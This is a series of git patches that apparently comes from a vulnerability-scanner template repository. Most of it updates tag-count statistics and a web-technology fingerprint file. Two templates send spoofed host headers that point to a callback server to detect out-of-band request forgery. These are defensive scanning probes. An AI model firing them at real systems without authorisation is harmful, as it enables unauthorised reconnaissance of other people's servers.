| | | | | | +| bedita | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | | werkzeug | 1 | | | | | | | | | | trilithic | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| openvpn | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| shiro | 1 | | | | | | | | | -| nifi | 1 | | | | | | | | | -| shoppable | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| clink-office | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| natemail | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| trane | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| elascticsearch | 1 | | | | | | | | | -| netgenie | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | | graphite | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| chyrp | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | | ruckus | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| tidb | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | | etouch | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| elasticsearch | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| ecoa | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| clockwork | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | | csod | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| s3 | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| lotus | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | | spidercontrol | 1 | | | | | | | | | | jaspersoft | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| actuator | 1 | | | | | | | | | -| daybyday | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| shoretel | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| email | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 079531ae29..74222ce600 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 | -| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 | -| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 | -| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 | -| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | -| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 198 | gy741 | 72 | takeovers | 64 | | | | | -| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | | -| cve2020 | 164 | madrobot | 61 | file | 46 | | | | | -| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | +| cve | 739 | pikpikcu | 273 | cves | 739 | info | 650 | http | 1991 | +| lfi | 266 | dhiyaneshdk | 268 | vulnerabilities | 307 | high | 560 | file | 46 | +| panel | 252 | daffainfo | 217 | exposed-panels | 250 | medium | 456 | network | 42 | +| xss | 248 | pdteam | 195 | technologies | 192 | critical | 276 | dns | 12 | +| wordpress | 235 | geeknik | 154 | exposures | 188 | low | 154 | | | +| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 200 | gy741 | 76 | takeovers | 64 | | | | | +| tech | 183 | pussycat0x | 69 | default-logins | 56 | | | | | +| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | +| wp-plugin | 161 | madrobot | 61 | workflows | 37 | | | | | From 3cf123a9d76cc9e51fe6bbc481d01cab68cc4554 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 Sep 2021 21:50:24 +0000 Subject: [PATCH 2604/4083] Auto README Update [Wed Sep 29 21:50:24 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 0b53bebb69..03e2db8dcf 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | cve2020 | 164 | madrobot | 61 | file | 46 | | | | | | wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | -**166 directories, 2144 files**. +**166 directories, 2155 files**. From be297d732b4b7f8efdade64ec7a75fe671159636 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 30 Sep 2021 03:26:16 +0530 Subject: [PATCH 2605/4083] misc update --- .../generic/oob-header-based-interaction.yaml | 15 +++++++++++---- .../generic/request-based-interaction.yaml | 7 +++++++ 2 files changed, 18 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/generic/oob-header-based-interaction.yaml b/vulnerabilities/generic/oob-header-based-interaction.yaml index 399af47472..b4404a4f0c 100644 --- a/vulnerabilities/generic/oob-header-based-interaction.yaml +++ b/vulnerabilities/generic/oob-header-based-interaction.yaml @@ -26,15 +26,22 @@ requests: X-Wap-Profile: http://{{interactsh-url}}/wap.xml X-Forwarded-For: spoofed.{{interactsh-url}} Contact: root@{{interactsh-url}} - X-Forwarded-Host: 'spoofed.{{interactsh-url}}' - X-Host: 'spoofed.{{interactsh-url}}' - X-Forwarded-Server: 'spoofed.{{interactsh-url}}' - X-HTTP-Host-Override: 'spoofed.{{interactsh-url}}' + X-Forwarded-Host: spoofed.{{interactsh-url}} + X-Host: spoofed.{{interactsh-url}} + X-Forwarded-Server: spoofed.{{interactsh-url}} + X-HTTP-Host-Override: spoofed.{{interactsh-url}} Cache-Control: no-transform + matchers-condition: or matchers: - type: word part: interactsh_protocol name: http words: - "http" + + - type: word + part: interactsh_protocol + name: dns + words: + - "dns" diff --git a/vulnerabilities/generic/request-based-interaction.yaml b/vulnerabilities/generic/request-based-interaction.yaml index e968c99cd6..9e7fe9e40a 100644 --- a/vulnerabilities/generic/request-based-interaction.yaml +++ b/vulnerabilities/generic/request-based-interaction.yaml @@ -41,9 +41,16 @@ requests: Accept: */* unsafe: true # Use Unsafe HTTP library for malformed HTTP requests. + matchers-condition: or matchers: - type: word part: interactsh_protocol name: http words: - "http" + + - type: word + part: interactsh_protocol + name: http + words: + - "http" From 553a7a2480211ac1e28fbe53ca89a699bf9f1857 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 30 Sep 2021 03:31:03 +0530 Subject: [PATCH 2606/4083] Update request-based-interaction.yaml --- vulnerabilities/generic/request-based-interaction.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/generic/request-based-interaction.yaml b/vulnerabilities/generic/request-based-interaction.yaml index 9e7fe9e40a..e532b15dde 100644 --- a/vulnerabilities/generic/request-based-interaction.yaml +++ b/vulnerabilities/generic/request-based-interaction.yaml @@ -51,6 +51,6 @@ requests: - type: word part: interactsh_protocol - name: http + name: dns words: - - "http" + - "dns" From b4dec21231918805d49249f3616e431cf82bf630 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 30 Sep 2021 04:19:15 +0530 Subject: [PATCH 2607/4083] misc update --- .../fingerprinthub-web-fingerprints.yaml | 3325 ++--------------- 1 file changed, 321 insertions(+), 3004 deletions(-) diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml index c47e4652f0..e3d7f77b2b 100644 --- a/technologies/fingerprinthub-web-fingerprints.yaml +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -1,15 +1,16 @@ id: fingerprinthub-web-fingerprints + info: name: FingerprintHub Technology Fingerprint author: pdteam + reference: https://github.com/0x727/FingerprintHub severity: info - reference: https://github.com/0x727/FingerprintHub/blob/main/web_fingerprint_v2.json tags: tech requests: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: or matchers: @@ -19,46 +20,39 @@ requests: - typeof(_08cms) - type: word - condition: and name: 1caitong words: - /custom/groupnewslist.aspx?groupid= - type: word - condition: and name: 21grid words: - 技术支持:网格(福建)智能科技有限公司 - type: word - condition: and name: 263-enterprise-mailbox words: - net263.wm.custom_login.homepage_init - type: word - condition: and name: 263-enterprise-mailbox words: - src="/custom_login/js/net263_wm_util.js - type: word - condition: and name: 263-hrm words: -

    请使用263em登陆!

    - type: word - condition: and name: 263-meeting words: - - type: word - condition: and name: 315soft-filesystem words: - - '>多可电子档案管理系统多可电子档案管理系统 - type: word - condition: and name: 360-tianqing words: - appid":"skylar6 - type: word - condition: and name: 360-tianqing words: - /task/index/detail?id={item.id} - type: word - condition: and name: 360-tianqing words: - 已过期或者未授权,购买请联系4008-136-360 - type: word - condition: and name: 360-webscan words: - webscan.360.cn/status/pai/hash - type: word - condition: and name: 365webcall words: - src='http://www.365webcall.com/imme1.aspx? - type: word - condition: and name: 365xxy-examing words: - href=https://unpkg.com/element-ui/lib/theme-chalk/index.css - type: word - condition: and name: 365xxy-examing words: - 云时政在线考试系统 - type: word - condition: and name: 3dcart words: - powered by 3dcart - type: word - condition: and part: header name: 3dcart words: - - 'X-Powered-By: 3dcart' + - "X-Powered-By: 3dcart" - type: word - condition: and name: 3kits-cms words: - 3kits - type: word - condition: and name: 3kits-cms words: - href="http://www.3kits.com" @@ -175,176 +155,147 @@ requests: - chat.53kf.com/kf.php - type: word - condition: and name: 53kf words: - powered by 53kf - type: word - condition: and name: 53kf words: - tb.53kf.com/code/ - type: word - condition: and name: 54-customer-service words: - src="http://code.54kefu.net/ - type: word - condition: and name: 5ikq words: - content="我爱考勤云平台 - type: word - condition: and name: 5ikq words: - 我爱考勤云平台 - type: word - condition: and name: 5k-crm words: - /public/js/5kcrm.js - type: word - condition: and name: 5vtechnologies-blueangelsoftwaresuite words: - /cgi-bin/webctrl.cgi?action=index_page - type: word - condition: and name: 6kbbs words: - powered by 6kbbs - type: word - condition: and name: 6kbbs words: - generator" content="6kbbs - type: word - condition: and name: 74cms words: - content="74cms.com" - type: word - condition: and name: 74cms words: - content="74cms.com - type: word - condition: and name: 74cms words: - content="骑士cms - type: word - condition: and name: 74cms words: - powered by 78OA办公系统 - type: word - condition: and name: 78oa words: - /resource/javascript/system/runtime.min.js - type: word - condition: and name: 78oa words: - license.78oa.com - type: word - condition: and name: 7moor-product words: - class="ds_do_action domain_aboutus" - type: word - condition: and name: 7moor-product words: - /javascripts/qiniu/qiniu.js - type: word - condition: and part: header name: a2b-webserver words: - - 'Server: a2b webserver' + - "Server: a2b webserver" - type: word - condition: and name: aakuan-attendance-system words: - href="scripts/popmodal.css" - type: word - condition: and name: aakuan-attendance-system words: - aakuan.cn - type: word - condition: and name: aardvark-topsites words: - aardvark topsites - type: word - condition: and name: accellion-secure-file-transfer words: - secured by accellion - type: word - condition: and name: account-manager-exhibition-system words: - action="/system/login/login.shtml - type: word - condition: and name: achecker-web-accessibility-evaluation-tool words: - content="achecker is a web accessibility - type: word - condition: and name: acsoft-cloud words: - sdiyun.com, all rights reserved - type: word - condition: and name: acsoft-cloud words: - onrememberpasswordclick @@ -357,43 +308,36 @@ requests: - by:lin.zhibin - type: word - condition: and name: acsoft-reimbursement-system words: - window.external.addfavorite(location.href,document.title); - type: word - condition: and name: act-manager words: - url:"/ucenter/login/loginaction!gettitle.action", - type: word - condition: and name: act-manager words: - - type: word - condition: and name: activecollab words: - powered by activecollab - type: word - condition: and name: activecollab words: -

    Acunetix - type: word - condition: and name: adaptec-maxview words: - action="/maxview/manager/login.xhtml - type: word - condition: and name: adimoney words: - adimoney - type: word - condition: and name: adimoney words: - 'content="adimoney.com mobile advertisement network. ' - type: word - condition: and name: adiscon-loganalyzer words: - adiscon gmbh - type: word - condition: and name: adminer words: - https://www.adminer.org - type: word - condition: and name: adobe-coldfusion words: - /cfajax/ - type: word - condition: and name: adobe-coldfusion words: - - type: word - condition: and name: adobe-connect words: - /common/scripts/showcontent.js - type: word - condition: and name: adobe-cq5 words: - _jcr_content - type: word - condition: and name: adobe-experience-manager words: - adobe experience manager - type: word - condition: and name: adobe-experience-manager words: - ' class="coral-heading coral-heading--1"' - type: word - condition: and name: adobe-flex words: - adobe flex - type: word - condition: and name: adobe-flex words: - learn more about flex at http://flex.org - type: word - condition: and name: adobe-golive words: - generator" content="adobe golive - type: word - condition: and name: adobe-magento words: - /skin/frontend/ - type: word - condition: and name: adobe-magento words: - blank_img - type: word - condition: and name: adobe-robohelp words: - generator" content="adobe robohelp - type: word - condition: and name: adt-iam words: - 